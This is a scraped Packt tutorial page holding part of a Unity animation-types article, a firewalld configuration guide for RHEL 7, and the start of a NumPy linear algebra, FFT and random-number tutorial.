second can sustain or contain a specified number of frames. The amount of frames passing within a second will vary from computer to computer, depending on the hardware capacity, the software installed, and other factors. The frame capacity per second is called FPS (frames per second). It's often used as a measure of performance for a game, since lower frame rates are typically associated with jittery and poor performance. Key frames Although a frame represents an opportunity for change, it doesn't necessarily mean change will occur. Many frames can pass by in a second, and not every frame requires a change. Moreover, even if a change needs to happen for a frame, it would be tedious if animators had to define every frame of action. One of the benefits of computer animation, contrasted with manual, or "old", animation techniques, is that it can make our lives easier. Animators can instead define key, or important, frames within an animation sequence, and then have the computer automatically generate the intervening frames. Consider a simple animation in which a standard bedroom door opens by rotating outwards on its hinges by 90 degrees. The animation begins with the door in the closed position and ends in an open position. Here, we have defined two key states for the door (open and closed), and these states mark the beginning and end of the animation sequence. These are called key frames, because they define key moments within the animation. On the basis of key frames, Unity (as we'll see) can autogenerate the in-between frames (tweens), smoothly rotating the door from its starting frame to its ending frame. The mathematical process of generating tweens is termed as interpolation. Animation types The previous section defined the core concepts underpinning animation generally. Specifically, it covered change, time, frames, key frames, tweens, and interpolation. On the basis of this, we can identify several types of animation in video games from a technical perspective, as opposed to an artistic one. All variations depend on the concepts we've seen, but they do so in different and important ways. These animation types are significant for Unity because the differences in their nature require us to handle and work with them differently, using specific workflows and techniques. The animation types are listed throughout this section, as follows. Rigid body animation Rigid body animation is used to create pre-made animation sequences that move or change the properties of objects, considering those objects as whole or complete entities, as opposed to objects with smaller and moving parts. Some examples of this type of animation are a car racing along the road, a door opening on its hinges, a spaceship flying through space on its trajectory, and a piano falling from the side of a building. Despite the differences among these examples, they all have an important common ingredient. Specifically, although the object changes across key frames, it does so as a single and complete object. In other words, although the door may rotate on its hinges from a closed state to an open state, it still ends the animation as a door, with the same internal structure and composition as before. It doesn't morph into a tiger or a lion. It doesn't explode or turn into jelly. It doesn't melt into rain drops. Throughout the animation, the door retains its physical structure. It changes only in terms of its position, rotation and scale. Thus, in rigid body animation, changes across key frames apply to whole objects and their highest level properties. They do not filter down to sub properties and internal components, and they don't change the essence or internal forms of objects. These kinds of animation can be defined either directly in the Unity animation editor, or inside 3D animation software (such as Maya, Max, or Blender) and then imported to Unity through mesh files. Key frame animation for rigid bodies Rigged or bone-based animation If you need to animate human characters, animals, flesh-eating goo, or exploding and deforming objects, then rigid body animation probably won't be enough. You'll need bone-based animation (also called rigged animation). This type of animation changes not the position, rotation, or scale of an object, but the movement and deformation of its internal parts across key frames. It works like this: the animation artist creates a network of special bone objects to approximate the underlying skeleton of a mesh, allowing independent and easy control of the surrounding and internal geometry. This is useful for animating arms, legs, head turns, mouth movements, tree rustling, and a lot more. Typically, bone-based animation is created as a complete animation sequence in 3D modeling software and is imported to Unity inside a mesh file, which can be processed and accessed via Mecanim, the Unity animation system. Bone-based animation is useful for character meshes Sprite animation For 2D games, graphical user interfaces, and a variety of special effects in 3D (such as water textures), you'll sometimes need a standard quad or plane mesh with a texture that animates. In this case, neither the object moves, as with rigid body animation, nor do any of its internal parts change, as with rigged animation. Rather, the texture itself animates. This animation type is called sprite animation. It takes a sequence of images or frames and plays them in order at a specified frame rate to achieve a consistent and animated look, for example, a walk cycle for a character in a 2D side-scrolling game. Physics-based animation In many cases, you can predefine your animation. That is, you can fully plan and create animation sequences for objects that will play in a predetermined way at runtime, such as walk cycles, sequences of door opening, explosions, and others. But sometimes, you need animation that appears realistic and yet responds to its world dynamically, based on decisions made by the player and other variable factors of the world that cannot be predicted ahead of time. There are different ways to handle these scenarios, but one is to use the Unity physics system, which includes components and other data that can be attached to objects to make them behave realistically. Examples of this include falling to the ground under the effects of gravity, and bending and twisting like cloth in the wind. Physics animation Morph animation Occasionally, none of the animation methods you've read so far—rigid body, physics-based, rigged, or sprite animation—give you what's needed. Maybe, you need to morph one thing into another, such as a man into a werewolf, a toad into a princess, or a chocolate bar into a castle. In some instances, you need to blend, or merge smoothly, the state of a mesh in one frame into a different state in a different frame. This is called morph animation, or blend shapes. Essentially, this method relies on snapshots of a mesh's vertices across key frames in an animation, and blends between the states via tweens. The downside to this method is its computational expense. It's typically performance intensive, but its results can be impressive and highly realistic. See the following screenshot for the effects of blend shapes: Morph animation start state BlendShapes transition a model from one state to another. See the following figure for the destination state: Morph animation end state Video animation Perhaps one of Unity's lesser known animation features is its ability to play video files as animated textures on desktop platforms and full-screen movies on mobile devices such as iOS and Android devices. Unity accepts OGV (Ogg Theora) videos as assets, and can replay both videos and sounds from these files as an animated texture on mesh objects in the scene. This allows developers to replay pre-rendered video file output from any animation package directly in their games. This feature is powerful and useful, but also performance intensive. Video file animation Particle animation Most animation methods considered so far are for clearly defined, tangible things in a scene, such as sprites and meshes. These are objects with clearly marked boundaries that separate them from other things. But you'll frequently need to animate less tangible, less solid, and less physical matter, such as smoke, fire, bubbles, sparkles, smog, swarms, fireworks, clouds, and others. For these purposes, a particle system is indispensable. Particle systems are entirely configurable objects that can be used to simulate rain, snow, flock of birds, and more. See the following screenshot for a particle system in action: Particle system animation Programmatic animation Surprisingly, the most common animation type is perhaps programmatic animation, or dynamic animation. If you need a spaceship to fly across the screen, a user-controlled character to move around an environment, or a door to open when approached, you'll probably need some programmatic animation. This refers to changes made to properties in objects over time, which arise because of programming—code that a developer has written specifically for that purpose. Unlike many other forms of animation, the programmatic form is not created or built in advance by an artist or animator per se, because its permutations and combinations cannot be known upfront. So, it's coded by a programmer and has the flexibility to change and adjust according to conditions and variables at runtime. Of course, in many cases, animations are made by artists and animators and the code simply triggers or guides the animation at runtime. Summary This article considered animation abstractly, as a form of art, and as a science. We covered the types of animation that are most common in Unity games. In addition, we examined some core tasks and ideas in programmatic animation, including the ability to animate and change objects dynamically through code without relying on pre-scripted or predefined animations, which will engross you in much of this article. Resources for Article: Further resources on this subject: Saying Hello to Unity and Android [article] Looking Back, Looking Forward [article] What's Your Input? [article]
Read more
  • 0
  • 0
  • 2689

article-image-securing-your-network-using-firewalld
Packt
23 Jun 2015
13 min read
Save for later

Securing Your Network using firewalld

Packt
23 Jun 2015
13 min read
In this article by Andrew Mallett, author of the book Learning RHEL Networking, we see on how to secure our network using the firewall daemon, that is, firewalld. The default user interface for netfilter, the kernel-based firewall, on RHEL7 is firewalld. Administrators now have a choice to use firewalld or iptables to manage firewalls. Underlying either process, we can still implement the kernel-based netfilter firewall. The frontend command to this new interface is firewall-cmd. The main benefit this offers is the ability to refresh the netfilter setting when the firewall is running. This is not possible with the iptables interface; additionally, we are able to use zone management. This enables us to have different firewall configurations, which depends on the network we are connected to. In this article, we will be cover the following topics: The firewall status Routing The zone management The source management Firewall rules using services Firewall rules using ports Masquerading and the network address translation Using rich rules Implementing direct rules Reverting to iptables (For more resources related to this topic, see here.) The firewall status The firewall service can provide protection for your RHEL system and services from other hosts on the local network or Internet. Although firewalling is often maintained on the border routers to your network, additional protection can be provided by host-based firewalls, such as the netfilter firewall on the Linux kernel. The netfilter firewall on RHEL 7 can be implemented via the iptables or firewalld service, with the latter being the default. The status of the firewalld service can be interrogated in a normal manner using the systemctl command. This will provide a verbose output if the service is running. This will include the PID (process ID) of firewalld along with recent log messages. The following is a command from RHEL7.1: # systemctl status firewalld If you just need a quick check with a less verbose output, make use of the firewall-cmd command. This is the main administrative tool used to manage firewalld. If firewalld was not active, the output would show as not running. Routing Although not strictly necessary for a firewall, you may need to implement routing on your RHEL7 system. Often, this will be associated with multi-homed systems with more than one network interface card; however, this is not a requirement of network routing, which allows packets to be forwarded to the correct destination network. Network routing is enabled in procfs in the /proc/sys/net/ipv4/ip_forward file. If this file contains a value of 0, then routing is disabled; if it has a value of 1, routing is enabled. This can be set using the echo command as follows: # echo 1 > /proc/sys/net/ipv4/ip_forward However, this is then turned on until the next reboot when the routing will revert to the configured setting. To make this setting permanent traditionally, the /etc/sysctl.conf file has been used. It's now recommended to add you own configurations to /etc/sysctl.d/. Here is an example of this: # echo "net.ipv4.ip_forward = 1" > /etc/sysctl.d/ipforward.conf This will create a file and set its directive. To make this setting effective prior to the next reboot, we can make use of the sysctl command, as shown in the following command: # sysctl -p /etc/sysctl.d/ipforward.conf Zone management A new feature you will find in firewalld that is more aimed at mobile systems—such as laptops—is the inclusion of zones. However, these zones can be equally used on a multihomed system, which associates different NICs with appropriate zones. Using zones in either mobile or multihomed systems, firewall rules can be assigned to zones and these rules will be associated with NICs included in that zone. If an interface is not assigned explicitly to a zone, then it will become a part of the default zone. To interrogate the default zone on your system, we can use the firewall-cmd command, as shown in the following command line: # firewall-cmd --get-default-zone Should you need to list all the configured zones on your system, the following command can be used: # firewall-cmd --get-zones Perhaps more usefully, we can display zones with interfaces assigned to them; if no assignments have been made, then all the interfaces will be in the public zone. The --get-active-zones option will help us with this, as shown in the following command: # firewall-cmd --get-active-zones Should we require a more verbose output, we can list all the zone names, associated rules, and interfaces. The following command demonstrates how this can be achieved: # firewall-cmd --list-all-zones If you need to utilize zones, you can choose the default zone and assign interfaces to specific zones as well. Firstly, assign a new default zone as follows: # firewall-cmd --set-default-zone=work Here, we redirect the default zone to the work zone. In this way, all NICs that have not been explicitly assigned will participate in the work zone. The preceding command should report back with success. We can also explicitly assign a zone to an interface as follows: # firewall-cmd --zone=public --change-interface=eno16777736 The change made through this command will be temporary until the next reboot; to make it permanent, we will add the --permanent option: # firewall-cmd --zone=public --change-interface=eno16777736 --permanent Making a setting permanent will persist the configuration within the zone file located in the /etc/firewalld/zones/ directory. In our case, the file is /etc/firewalld/zones/public.xml. After having implemented the permanent change as detailed here, we can list the contents of the XML file with the cat command. We can either interrogate an individual NIC to view the zone it's associated with or list all interfaces within a zone; the following commands illustrate this: # firewall-cmd --get-zone-of-interface=eno16777736 # firewall-cmd --zone=public --list-all You can use tab completion to assist with options and arguments with firewall-cmd. If the supplied zones are not ample or perhaps the names do not work for your naming schemes, it's possible to create your own zones and add interfaces and rules. After adding your zone, you can reload the configuration to allow it to be used immediately as follows: # firewall-cmd --permanent --new-zone=packt # firewall-cmd --reload The --reload option can reload the configuration that allows current connections to continue uninterrupted; whereas the --complete-reload option will stop all connections during the process. Source management The problem that you may encounter using interfaces assigned to your zones is that it does not differentiate between network addresses. Often, this is not an issue as only one network address is bound to the NIC; however, if you have more than one address bound to the NIC, you may want to implement the firewalld source. Like interfaces, sources can be assigned to zones. In the following command, we will add a network range to the trusted zone and another range, perhaps on the same NIC to the public zone: # firewall-cmd --permanent --zone=trusted --add-source=192.168.1.0/24 # firewall-cmd --permanent --zone=public --add-source=172.17.0.0/16 Similar to interfaces, binding a source to a zone will activate that zone and will be listed with the --get-active-zones option. Firewall rules using services When we think of firewalls, we think of allowing or denial of access to ports. The use of service XML files can ease the port management with one service, perhaps listing multiple ports. The other point to take note of is that firewalld daemon's default policy is to deny access, so any access needed has to be explicitly granted to a port associated with a service. To list services that have been allowed on the default zone, we can simply use the --list-services option, as shown in the following example: # firewall-cmd --list-services Similarly, we can gain access to services allowed in a specific zone by including the --zone= option. This can be seen in the following example: # firewall-cmd --zone=home --list-services As you start enabling services, you can easily allow a predefined service through a zone. Predefined services are listed as XML files in the /usr/lib/firewalld/services directory. RHEL 7 is representative of a more mature Linux distribution; as such, it recognizes that the need to separate the /usr directory from the root filesystem is depreciated and the /lib, /bin, and /sbin directories are soft-linked to their respective directories after /usr/. Hence, /lib is now the same as /usr/lib. While defining your own services, you may create XML files within the /etc/firewalld/services directory. The squid proxy server does not have its own service file, and if we choose to allow this as a service rather than just opening the required port the file would look similar to the /etc/firewalld/services/squid.xml, as follows: <?xml version="1.0" encoding="utf-8"?> <service> <short>Squid</short> <description>Squid Web Proxy</description> <port protocol="tcp" port="3128"/> </service> Assuming that we are using SELinux in the Enforcing mode, we will need to set the correct context for the new file using the following commands: # cd /etc/firewalld/services # restorecon squid.xml The permissions on this file should be 640 and it will be set using the following command: # chmod 640 /etc/firewalld/services/squid.xml Having defined the new service now or using pre-existing services, we can add them to a zone. If we are using the default zone, this is achieved simply with the following commands. Note that we reload the configuration at the start to identify the new squid service as follows: # firewall-cmd --reload # firewall-cmd --permanent --add-service=squid # firewall-cmd --reload Similarly, to update a specified zone other than the default zone, we will use the following commands: # firewall-cmd --permanent --add-service=squid --zone=work # firewall-cmd --reload Should we later need to remove this service from the work zone, we can use the following command: # firewall-cmd --permanent --remove-service=squid --zone=work # firewall-cmd --reload Firewall rules using ports In the previous example, where the squid service only required a single port, we could easily add a port rule to allow access to a service. Although the process is simple, in some organizations, the preference will still be to create the service file that documents the need of the port in the description field. If we need to add a port, we have similar options in --add-port and --remove-port. The following command shows how to add the squid TCP port 3128 to the work zone without the need to define the service file: # firewall-cmd --permanent --add-port=3128/tcp --zone=work # firewall-cmd --reload Masquerading and Network Address Translation If your firewalld server is your network router running RHEL 7, you may wish to provide access to the Internet to your internal hosts on a private network. If this is the case, we can enable masquerading. This is also known as NAT (Network Address Translation), where the server's public IP address is used by internal clients. To establish this, we can make use of the built-in internal and external zones and configure masquerading on the external zone. The internal NIC should be assigned to the internal zone and the external NIC should be assigned to the external zone. To establish masquerading on the external zone, we can use the following command: # firewall-cmd --zone=external --add-masquerade Masquerading is removed using the --remove-masquerade option. We may also query the status of masquerading in a zone using the --query-masquerade option. Using rich rules The firewalld rich language allows an administrator to easily configure more complex firewall rules without having knowledge of the iptables syntax. This can include logging and examination of the source address. To add a rule to allow NTP connection on the default zone, but logging the connection at no more than 1 per minute, use the following command: # firewall-cmd --permanent --add-rich-rule='rule service name="ntp" audit limit value="1/m" accept' # firewall-cmd --reload Similarly, we can add a rule that only allows access to the squid service from one subnet only: # firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="192.166.0.0/24" service name="squid" accept' # firewall-cmd --reload The Fedora project maintains the documentation for rich rules in firewalld and these can be accessed at https://fedoraproject.org/wiki/Features/FirewalldRichLanguage should you need more detailed examples. Implementing direct rules If you have a prior experience with iptables and want to combine you knowledge of iptables with the features in firewalld, direct rules are here to help with this migration. Firstly, if we want to implement a rule on the INPUT chain, we can check the current settings with the following command: # firewall-cmd --direct --get-rules ipv4 filter INPUT If you have not added any rules, the output will be empty. We will add a new rule and use a priority of 0. This means that it will be listed at the top of the chain; however, this means little when no other rules are in place. We do need to verify that rules are added in the correct order to process if other rules are implemented: # firewall-cmd --permanent --direct --add-rule ipv4 filter INPUT 0 -p tcp --dport 3128 -j ACCEPT # firewall-cmd --reload Reverting to iptables Additionally, there is nothing stopping you from using the iptables service if this is what you are most familiar with. Firstly, we can install iptables with the following command: # yum install iptables-service We can mask the firewalld service to more effectively disable the service, preventing it from being started without first unmasking this service: # systemctl mask firewalld We can enable iptables with the following commands: # systemctl enable iptables # systemctl enable ip6tables # systemctl start iptables # systemctl start ip6tables Permanent rules are added as they always have been, via the /etc/sysconfig directory and the iptables and ip6tables files. The firewalld project is maintained by Fedora and is the new administrative service and interface for the netfilter firewall on the Linux Kernel. As administrators, we can choose to use this default service or switch back to iptables; however, firewalld is able to provide us with the ability to reload configuration without dropping connections and mechanisms to migrate from iptables. We have seen how we can use zones to segregate network interfaces and sources if we need to share address ranges on a single NIC. Neither the NIC nor the source is bound to the zone. We can then add rules to a zone to control access to our resources. These rules are based on services or ports. If more complexity is required, we have the option of using rich or direct rules. Rich rules are written in the rich language from firewalld, whereas direct rules are written in the iptables syntax. Summary In this article, you learned on how to secure your network using firewalld. Resources for Article: Further resources on this subject: Installation of Oracle VM VirtualBox on Linux [article] Managing public and private groups [article] Target Exploitation [article]
Read more
  • 0
  • 0
  • 9404
article-image-moving-further-numpy-modules
Packt
23 Jun 2015
23 min read
Save for later

Moving Further with NumPy Modules

Packt
23 Jun 2015
23 min read
NumPy has a number of modules inherited from its predecessor, Numeric. Some of these packages have a SciPy counterpart, which may have fuller functionality. In this article by Ivan Idris author of the book NumPy: Beginner's Guide - Third Edition we will cover the following topics: The linalg package The fft package Random numbers Continuous and discrete distributions (For more resources related to this topic, see here.) Linear algebra Linear algebra is an important branch of mathematics. The numpy.linalg package contains linear algebra functions. With this module, you can invert matrices, calculate eigenvalues, solve linear equations, and determine determinants, among other things (see http://docs.scipy.org/doc/numpy/reference/routines.linalg.html). Time for action – inverting matrices The inverse of a matrix A in linear algebra is the matrix A-1, which, when multiplied with the original matrix, is equal to the identity matrix I. This can be written as follows: A A-1 = I The inv() function in the numpy.linalg package can invert an example matrix with the following steps: Create the example matrix with the mat() function: A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A) The A matrix appears as follows: A [[ 0 1 2] [ 1 0 3] [ 4 -3 8]] Invert the matrix with the inv() function: inverse = np.linalg.inv(A) print("inverse of An", inverse) The inverse matrix appears as follows: inverse of A [[-4.5 7. -1.5] [-2.   4. -1. ] [ 1.5 -2.   0.5]] If the matrix is singular, or not square, a LinAlgError is raised. If you want, you can check the result manually with a pen and paper. This is left as an exercise for the reader. Check the result by multiplying the original matrix with the result of the inv() function: print("Checkn", A * inverse) The result is the identity matrix, as expected: Check [[ 1. 0. 0.] [ 0. 1. 0.] [ 0. 0. 1.]] What just happened? We calculated the inverse of a matrix with the inv() function of the numpy.linalg package. We checked, with matrix multiplication, whether this is indeed the inverse matrix (see inversion.py): from __future__ import print_function import numpy as np   A = np.mat("0 1 2;1 0 3;4 -3 8") print("An", A)   inverse = np.linalg.inv(A) print("inverse of An", inverse)   print("Checkn", A * inverse) Pop quiz – creating a matrix Q1. Which function can create matrices? array create_matrix mat vector Have a go hero – inverting your own matrix Create your own matrix and invert it. The inverse is only defined for square matrices. The matrix must be square and invertible; otherwise, a LinAlgError exception is raised. Solving linear systems A matrix transforms a vector into another vector in a linear way. This transformation mathematically corresponds to a system of linear equations. The numpy.linalg function solve() solves systems of linear equations of the form Ax = b, where A is a matrix, b can be a one-dimensional or two-dimensional array, and x is an unknown variable. We will see the dot() function in action. This function returns the dot product of two floating-point arrays. The dot() function calculates the dot product (see https://www.khanacademy.org/math/linear-algebra/vectors_and_spaces/dot_cross_products/v/vector-dot-product-and-vector-length). For a matrix A and vector b, the dot product is equal to the following sum: Time for action – solving a linear system Solve an example of a linear system with the following steps: Create A and b: A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A) b = np.array([0, 8, -9]) print("bn", b) A and b appear as follows: Solve this linear system with the solve() function: x = np.linalg.solve(A, b) print("Solution", x) The solution of the linear system is as follows: Solution [ 29. 16.   3.] Check whether the solution is correct with the dot() function: print("Checkn", np.dot(A , x)) The result is as expected: Check [[ 0. 8. -9.]] What just happened? We solved a linear system using the solve() function from the NumPy linalg module and checked the solution with the dot() function: from __future__ import print_function import numpy as np   A = np.mat("1 -2 1;0 2 -8;-4 5 9") print("An", A)   b = np.array([0, 8, -9]) print("bn", b)   x = np.linalg.solve(A, b) print("Solution", x)   print("Checkn", np.dot(A , x)) Finding eigenvalues and eigenvectors Eigenvalues are scalar solutions to the equation Ax = ax, where A is a two-dimensional matrix and x is a one-dimensional vector. Eigenvectors are vectors corresponding to eigenvalues (see https://www.khanacademy.org/math/linear-algebra/alternate_bases/eigen_everything/v/linear-algebra-introduction-to-eigenvalues-and-eigenvectors). The eigvals() function in the numpy.linalg package calculates eigenvalues. The eig() function returns a tuple containing eigenvalues and eigenvectors. Time for action – determining eigenvalues and eigenvectors Let's calculate the eigenvalues of a matrix: Create a matrix as shown in the following: A = np.mat("3 -2;1 0") print("An", A) The matrix we created looks like the following: A [[ 3 -2] [ 1 0]] Call the eigvals() function: print("Eigenvalues", np.linalg.eigvals(A)) The eigenvalues of the matrix are as follows: Eigenvalues [ 2. 1.] Determine eigenvalues and eigenvectors with the eig() function. This function returns a tuple, where the first element contains eigenvalues and the second element contains corresponding eigenvectors, arranged column-wise: eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors) The eigenvalues and eigenvectors appear as follows: First tuple of eig [ 2. 1.] Second tuple of eig [[ 0.89442719 0.70710678] [ 0.4472136   0.70710678]] Check the result with the dot() function by calculating the right and left side of the eigenvalues equation Ax = ax: for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() The output is as follows: Left [[ 1.78885438] [ 0.89442719]] Right [[ 1.78885438] [ 0.89442719]] What just happened? We found the eigenvalues and eigenvectors of a matrix with the eigvals() and eig() functions of the numpy.linalg module. We checked the result using the dot() function (see eigenvalues.py): from __future__ import print_function import numpy as np   A = np.mat("3 -2;1 0") print("An", A)   print("Eigenvalues", np.linalg.eigvals(A) )   eigenvalues, eigenvectors = np.linalg.eig(A) print("First tuple of eig", eigenvalues) print("Second tuple of eign", eigenvectors)   for i, eigenvalue in enumerate(eigenvalues):      print("Left", np.dot(A, eigenvectors[:,i]))      print("Right", eigenvalue * eigenvectors[:,i])      print() Singular value decomposition Singular value decomposition (SVD) is a type of factorization that decomposes a matrix into a product of three matrices. The SVD is a generalization of the previously discussed eigenvalue decomposition. SVD is very useful for algorithms such as the pseudo inverse, which we will discuss in the next section. The svd() function in the numpy.linalg package can perform this decomposition. This function returns three matrices U, ?, and V such that U and V are unitary and ? contains the singular values of the input matrix: The asterisk denotes the Hermitian conjugate or the conjugate transpose. The complex conjugate changes the sign of the imaginary part of a complex number and is therefore not relevant for real numbers. A complex square matrix A is unitary if A*A = AA* = I (the identity matrix). We can interpret SVD as a sequence of three operations—rotation, scaling, and another rotation. We already transposed matrices in this article. The transpose flips matrices, turning rows into columns, and columns into rows. Time for action – decomposing a matrix It's time to decompose a matrix with the SVD using the following steps: First, create a matrix as shown in the following: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Decompose the matrix with the svd() function: U, Sigma, V = np.linalg.svd(A, full_matrices=False) print("U") print(U) print("Sigma") print(Sigma) print("V") print(V) Because of the full_matrices=False specification, NumPy performs a reduced SVD decomposition, which is faster to compute. The result is a tuple containing the two unitary matrices U and V on the left and right, respectively, and the singular values of the middle matrix: U [[-0.9486833 -0.31622777]   [-0.31622777 0.9486833 ]] Sigma [ 18.97366596   9.48683298] V [[-0.33333333 -0.66666667 -0.66666667] [ 0.66666667 0.33333333 -0.66666667]] We do not actually have the middle matrix—we only have the diagonal values. The other values are all 0. Form the middle matrix with the diag() function. Multiply the three matrices as follows: print("Productn", U * np.diag(Sigma) * V) The product of the three matrices is equal to the matrix we created in the first step: Product [[ 4. 11. 14.] [ 8.   7. -2.]] What just happened? We decomposed a matrix and checked the result by matrix multiplication. We used the svd() function from the NumPy linalg module (see decomposition.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   U, Sigma, V = np.linalg.svd(A, full_matrices=False)   print("U") print(U)   print("Sigma") print(Sigma)   print("V") print(V)   print("Productn", U * np.diag(Sigma) * V) Pseudo inverse The Moore-Penrose pseudo inverse of a matrix can be computed with the pinv() function of the numpy.linalg module (see http://en.wikipedia.org/wiki/Moore%E2%80%93Penrose_pseudoinverse). The pseudo inverse is calculated using the SVD (see previous example). The inv() function only accepts square matrices; the pinv() function does not have this restriction and is therefore considered a generalization of the inverse. Time for action – computing the pseudo inverse of a matrix Let's compute the pseudo inverse of a matrix: First, create a matrix: A = np.mat("4 11 14;8 7 -2") print("An", A) The matrix we created looks like the following: A [[ 4 11 14] [ 8 7 -2]] Calculate the pseudo inverse matrix with the pinv() function: pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv) The pseudo inverse result is as follows: Pseudo inverse [[-0.00555556 0.07222222] [ 0.02222222 0.04444444] [ 0.05555556 -0.05555556]] Multiply the original and pseudo inverse matrices: print("Check", A * pseudoinv) What we get is not an identity matrix, but it comes close to it: Check [[ 1.00000000e+00   0.00000000e+00] [ 8.32667268e-17   1.00000000e+00]] What just happened? We computed the pseudo inverse of a matrix with the pinv() function of the numpy.linalg module. The check by matrix multiplication resulted in a matrix that is approximately an identity matrix (see pseudoinversion.py): from __future__ import print_function import numpy as np   A = np.mat("4 11 14;8 7 -2") print("An", A)   pseudoinv = np.linalg.pinv(A) print("Pseudo inversen", pseudoinv)   print("Check", A * pseudoinv) Determinants The determinant is a value associated with a square matrix. It is used throughout mathematics; for more details, please refer to http://en.wikipedia.org/wiki/Determinant. For a n x n real value matrix, the determinant corresponds to the scaling a n-dimensional volume undergoes when transformed by the matrix. The positive sign of the determinant means the volume preserves its orientation (clockwise or anticlockwise), while a negative sign means reversed orientation. The numpy.linalg module has a det() function that returns the determinant of a matrix. Time for action – calculating the determinant of a matrix To calculate the determinant of a matrix, follow these steps: Create the matrix: A = np.mat("3 4;5 6") print("An", A) The matrix we created appears as follows: A [[ 3. 4.] [ 5. 6.]] Compute the determinant with the det() function: print("Determinant", np.linalg.det(A)) The determinant appears as follows: Determinant -2.0 What just happened? We calculated the determinant of a matrix with the det() function from the numpy.linalg module (see determinant.py): from __future__ import print_function import numpy as np   A = np.mat("3 4;5 6") print("An", A)   print("Determinant", np.linalg.det(A)) Fast Fourier transform The Fast Fourier transform (FFT) is an efficient algorithm to calculate the discrete Fourier transform (DFT). The Fourier series represents a signal as a sum of sine and cosine terms. FFT improves on more naïve algorithms and is of order O(N log N). DFT has applications in signal processing, image processing, solving partial differential equations, and more. NumPy has a module called fft that offers FFT functionality. Many functions in this module are paired; for those functions, another function does the inverse operation. For instance, the fft() and ifft() function form such a pair. Time for action – calculating the Fourier transform First, we will create a signal to transform. Calculate the Fourier transform with the following steps: Create a cosine wave with 30 points as follows: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Apply the inverse transform with the ifft() function. It should approximately return the original signal. Check with the following line: print(np.all(np.abs(np.fft.ifft(transformed) - wave)   < 10 ** -9)) The result appears as follows: True Plot the transformed signal with matplotlib: plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() The following resulting diagram shows the FFT result: What just happened? We applied the fft() function to a cosine wave. After applying the ifft() function, we got our signal back (see fourier.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) print(np.all(np.abs(np.fft.ifft(transformed) - wave) < 10 ** -9))   plt.plot(transformed) plt.title('Transformed cosine') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.show() Shifting The fftshift() function of the numpy.linalg module shifts zero-frequency components to the center of a spectrum. The zero-frequency component corresponds to the mean of the signal. The ifftshift() function reverses this operation. Time for action – shifting frequencies We will create a signal, transform it, and then shift the signal. Shift the frequencies with the following steps: Create a cosine wave with 30 points: x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) Transform the cosine wave with the fft() function: transformed = np.fft.fft(wave) Shift the signal with the fftshift() function: shifted = np.fft.fftshift(transformed) Reverse the shift with the ifftshift() function. This should undo the shift. Check with the following code snippet: print(np.all((np.fft.ifftshift(shifted) - transformed)   < 10 ** -9)) The result appears as follows: True Plot the signal and transform it with matplotlib: plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() The following diagram shows the effect of the shift and the FFT: What just happened? We applied the fftshift() function to a cosine wave. After applying the ifftshift() function, we got our signal back (see fouriershift.py): import numpy as np import matplotlib.pyplot as plt     x = np.linspace(0, 2 * np.pi, 30) wave = np.cos(x) transformed = np.fft.fft(wave) shifted = np.fft.fftshift(transformed) print(np.all(np.abs(np.fft.ifftshift(shifted) - transformed) < 10 ** -9))   plt.plot(transformed, lw=2, label="Transformed") plt.plot(shifted, '--', lw=3, label="Shifted") plt.title('Shifted and transformed cosine wave') plt.xlabel('Frequency') plt.ylabel('Amplitude') plt.grid() plt.legend(loc='best') plt.show() Random numbers Random numbers are used in Monte Carlo methods, stochastic calculus, and more. Real random numbers are hard to generate, so, in practice, we use pseudo random numbers, which are random enough for most intents and purposes, except for some very special cases. These numbers appear random, but if you analyze them more closely, you will realize that they follow a certain pattern. The random numbers-related functions are in the NumPy random module. The core random number generator is based on the Mersenne Twister algorithm—a standard and well-known algorithm (see https://en.wikipedia.org/wiki/Mersenne_Twister). We can generate random numbers from discrete or continuous distributions. The distribution functions have an optional size parameter, which tells NumPy how many numbers to generate. You can specify either an integer or a tuple as size. This will result in an array filled with random numbers of appropriate shape. Discrete distributions include the geometric, hypergeometric, and binomial distributions. Time for action – gambling with the binomial The binomial distribution models the number of successes in an integer number of independent trials of an experiment, where the probability of success in each experiment is a fixed number (see https://www.khanacademy.org/math/probability/random-variables-topic/binomial_distribution). Imagine a 17th century gambling house where you can bet on flipping pieces of eight. Nine coins are flipped. If less than five are heads, then you lose one piece of eight, otherwise you win one. Let's simulate this, starting with 1,000 coins in our possession. Use the binomial() function from the random module for that purpose. To understand the binomial() function, look at the following section: Initialize an array, which represents the cash balance, to zeros. Call the binomial() function with a size of 10000. This represents 10,000 coin flips in our casino: cash = np.zeros(10000) cash[0] = 1000 outcome = np.random.binomial(9, 0.5, size=len(cash)) Go through the outcomes of the coin flips and update the cash array. Print the minimum and maximum of the outcome, just to make sure we don't have any strange outliers: for i in range(1, len(cash)):    if outcome[i] < 5:      cash[i] = cash[i - 1] - 1    elif outcome[i] < 10:      cash[i] = cash[i - 1] + 1    else:      raise AssertionError("Unexpected outcome " + outcome)   print(outcome.min(), outcome.max()) As expected, the values are between 0 and 9. In the following diagram, you can see the cash balance performing a random walk: What just happened? We did a random walk experiment using the binomial() function from the NumPy random module (see headortail.py): from __future__ import print_function import numpy as np import matplotlib.pyplot as plt     cash = np.zeros(10000) cash[0] = 1000 np.random.seed(73) outcome = np.random.binomial(9, 0.5, size=len(cash))   for i in range(1, 